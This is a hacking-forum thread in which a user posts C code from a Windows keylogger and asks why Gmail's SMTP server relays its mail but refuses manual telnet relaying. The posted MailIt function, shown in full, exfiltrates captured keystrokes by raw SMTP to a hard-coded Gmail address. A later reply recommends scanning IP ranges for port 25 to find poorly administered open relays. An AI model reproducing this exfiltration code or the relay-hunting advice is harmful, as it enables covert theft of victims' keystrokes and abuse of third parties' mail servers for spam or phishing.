mail relaying using SMTP server

For beginners, flames not allowed...(just by the staff :P)
Post Reply
User avatar
the_gr8_rules
forum buddy
forum buddy
Posts: 14
Joined: 05 Sep 2006, 16:00
14
Contact:

mail relaying using SMTP server

Post by the_gr8_rules »

Hello all,
Please clear me the concept.

i've a code written in 'c' which is actually a keylogger which can send the data to a remote machine.
It has win32 API and socket programming.
Now in the code the smtp server has to be specified. Suppose i'm specifying that of gmail.com (MX: mail exchange server)
the code works fine and send the mail to my gmail account.

Now the question is....if i telnet to same SMTP server on port number 25...it doesn't allows me mail relaying. Why so ???

Code: Select all

#define cmailserver "gmail-smtp-in.l.google.com"
.....
.....


strcpy(line,"[b]helo[/b] me.somepalace.com\n");
     fputs(line,smtpfile);
     bytes_sent=send(sockfd,line,strlen(line),0);
     sleep(waittime);
     err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
     fputs(Rec_Buf,smtpfile);
     strcpy(line,"[b]MAIL FROM:[/b]<");
     strncat(line,emailfrom,strlen(emailfrom));
     strncat(line,">\n",3);
     fputs(line,smtpfile);
     bytes_sent=send(sockfd,line,strlen(line),0);
     sleep(waittime);
     err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
     fputs(Rec_Buf,smtpfile);
     strcpy(line,"[b]RCPT TO:[/b]<");
     strncat(line,emailto,strlen(emailto));
     strncat(line,">\n",3);
     fputs(line,smtpfile);
     bytes_sent=send(sockfd,line,strlen(line),0);
     sleep(waittime);
     err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
     fputs(Rec_Buf,smtpfile);
     strcpy(line,"[b]DATA[/b]\n");
     fputs(line,smtpfile);
     bytes_sent=send(sockfd,line,strlen(line),0);
     sleep(waittime);
     err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
     fputs(Rec_Buf,smtpfile);
     sleep(waittime);
     strcpy(line,"To:");
     strcat(line,emailto);
     strcat(line,"\n");
     strcat(line,"From:");
     strcat(line,emailfrom);
     strcat(line,"\n");
     strcat(line,"Subject:");
     strcat(line,emailsubject);
regards

User avatar
bad_brain
Site Owner
Site Owner
Posts: 11598
Joined: 06 Apr 2005, 16:00
16
Location: The zone.
Contact:

Post by bad_brain »

Code: Select all

220 mx.gmail.com ESMTP 36sm10586055huc                        
ehlo mx.gmail.com                                             
250-mx.gmail.com at your service, [87.xxx.xx.xxx]             
250-SIZE 20971520                                             
250-8BITMIME                                                  
250-STARTTLS                                                  
250 ENHANCEDSTATUSCODES                                       
MAIL FROM xxxxx@gmail.com                                   
530 5.7.0 Must issue a STARTTLS command first 36sm10586055huc  
no SMTP AUTH option, so it's not possible to send a mail without having a certificate for using STARTTLS, check here for info on STARTTLS:
http://www.sendmail.org/~ca/email/starttls.html

seems gmail is simply not the right place for mail relays...:wink:

User avatar
the_gr8_rules
forum buddy
forum buddy
Posts: 14
Joined: 05 Sep 2006, 16:00
14
Contact:

Post by the_gr8_rules »

bad_brain wrote:

Code: Select all

220 mx.gmail.com ESMTP 36sm10586055huc                        
ehlo mx.gmail.com                                             
250-mx.gmail.com at your service, [87.xxx.xx.xxx]             
250-SIZE 20971520                                             
250-8BITMIME                                                  
250-STARTTLS                                                  
250 ENHANCEDSTATUSCODES                                       
MAIL FROM xxxxx@gmail.com                                   
530 5.7.0 Must issue a STARTTLS command first 36sm10586055huc  
no SMTP AUTH option, so it's not possible to send a mail without having a certificate for using STARTTLS, check here for info on STARTTLS:
http://www.sendmail.org/~ca/email/starttls.html

seems gmail is simply not the right place for mail relays...:wink:
but the code is sending mails using SMTP of gmail only...If u want i can post the whole code.

regards

User avatar
bad_brain
Site Owner
Site Owner
Posts: 11598
Joined: 06 Apr 2005, 16:00
16
Location: The zone.
Contact:

Post by bad_brain »

well, I'm not a C guy, but you can post the part where the connection is made....the part you posted is just for sending the mail itself, so it would be useful to see how the connection is established.. :)

User avatar
the_gr8_rules
forum buddy
forum buddy
Posts: 14
Joined: 05 Sep 2006, 16:00
14
Contact:

Post by the_gr8_rules »

Code: Select all

#include <windows.h>
#include <stdio.h>
#include <winuser.h>
#include <windowsx.h>
#include <time.h>
int MailIt (char *mailserver, char *emailto, char *emailfrom, 
char *emailsubject, char *emailmessage);
#define BUFSIZE 800
#define waittime 500

#define cmailserver "gmail-smtp-in.l.google.com"
#define cemailto "xyz@gmail.com"
#define cemailfrom "abc@gmail.com"
#define LogLength 100
........
........ (key capturing activities here...
........
// now the socket programming code...

int MailIt (char *mailserver, char *emailto, char *emailfrom, 
char *emailsubject, char *emailmessage) {
    SOCKET sockfd;
    WSADATA wsaData;
    FILE *smtpfile;
    
    #define bufsize 300
    int bytes_sent;   /* Sock FD */
    int err;
    struct hostent *host;   /* info from gethostbyname */
    struct sockaddr_in dest_addr;   /* Host Address */
    char line[1000];
    char *Rec_Buf = (char*) malloc(bufsize+1);
    smtpfile=fopen(SMTPLog,"a+");
    if (WSAStartup(0x202,&wsaData) == SOCKET_ERROR) {
      fputs("WSAStartup failed",smtpfile);
      WSACleanup();
      return -1;
    }
    if ( (host=gethostbyname(mailserver)) == NULL) {
       perror("gethostbyname");
       exit(1);
    }
    memset(&dest_addr,0,sizeof(dest_addr));
    memcpy(&(dest_addr.sin_addr),host->h_addr,host->h_length);

     /* Prepare dest_addr */
     dest_addr.sin_family= host->h_addrtype;  /* AF_INET from gethostbyname */
     dest_addr.sin_port= htons(25); /* PORT defined above */

     /* Get socket */

     if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0) {
        perror("socket");
        exit(1);
        }
     /* Connect !*/
     fputs("Connecting....\n",smtpfile);
 
    if (connect(sockfd, (struct sockaddr *)&dest_addr,sizeof(dest_addr)) == -1){
        perror("connect");
        exit(1);
        }
     sleep(waittime);
     err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
     fputs(Rec_Buf,smtpfile);
     strcpy(line,"helo me.somepalace.com\n");
     fputs(line,smtpfile);
     bytes_sent=send(sockfd,line,strlen(line),0);
     sleep(waittime);
     err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
     fputs(Rec_Buf,smtpfile);
     strcpy(line,"MAIL FROM:<");
     strncat(line,emailfrom,strlen(emailfrom));
     strncat(line,">\n",3);
     fputs(line,smtpfile);
     bytes_sent=send(sockfd,line,strlen(line),0);
     sleep(waittime);
     err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
     fputs(Rec_Buf,smtpfile);
     strcpy(line,"RCPT TO:<");
     strncat(line,emailto,strlen(emailto));
     strncat(line,">\n",3);
     fputs(line,smtpfile);
     bytes_sent=send(sockfd,line,strlen(line),0);
     sleep(waittime);
     err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
     fputs(Rec_Buf,smtpfile);
     strcpy(line,"DATA\n");
     fputs(line,smtpfile);
     bytes_sent=send(sockfd,line,strlen(line),0);
     sleep(waittime);
     err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
     fputs(Rec_Buf,smtpfile);
     sleep(waittime);
     strcpy(line,"To:");
     strcat(line,emailto);
     strcat(line,"\n");
     strcat(line,"From:");
     strcat(line,emailfrom);
     strcat(line,"\n");
     strcat(line,"Subject:");
     strcat(line,emailsubject);
     strcat(line,"\n");
     strcat(line,emailmessage);
     strcat(line,"\r\n.\r\n");
     fputs(line,smtpfile);
     bytes_sent=send(sockfd,line,strlen(line),0);
     sleep(waittime);
     err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
     fputs(Rec_Buf,smtpfile);
     strcpy(line,"quit\n");
     fputs(line,smtpfile);
     bytes_sent=send(sockfd,line,strlen(line),0);
     sleep(waittime);
     err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
     fputs(Rec_Buf,smtpfile);
     fclose(smtpfile);                          
     #ifdef WIN32
     closesocket(sockfd);
     WSACleanup();
     #else
     close(sockfd);
     #endif
}

User avatar
DNR
Digital Mercenary
Digital Mercenary
Posts: 6114
Joined: 24 Feb 2006, 17:00
15
Location: Michigan USA
Contact:

review, and maybe the answer

Post by DNR »

review;

You are sending emails using a gmail server and gmail email address, most servers will process email for users of its network, gmail. Try using another email than gmail, it might be denied. This is to prevent spammers from relaying emails from their server.

Port 25 is the SMTP port, but more and more large companies secure the port to stop spam. No company wants its customers phished from its own network. Smart sysadmins will hide the banners and set the simple rule of only allowing valid users of its network to relay mail. Since you are Mail from and Rcpt to a gmail account, you might have found the inherent flaw of weak rulesets.
define cmailserver "gmail-smtp-in.l.google.com"
define cemailto "xyz@gmail.com"
define cemailfrom "abc@gmail.com"
As far as not being able to telnet to the port 25, its rulesets may not allow an IP outside the network's IP range to connect. Or you are trying to send email to/from a non-gmail account.

You need to find a smaller, poorly administrated server. IP Range Scanning for port 25 can get you a list, Sam Spade can help you check for the relaying exploit.
-
He gives wisdom to the wise and knowledge to the discerning. He reveals deep and hidden things; he knows what lies in Darkness, and Light dwells with him.

Post Reply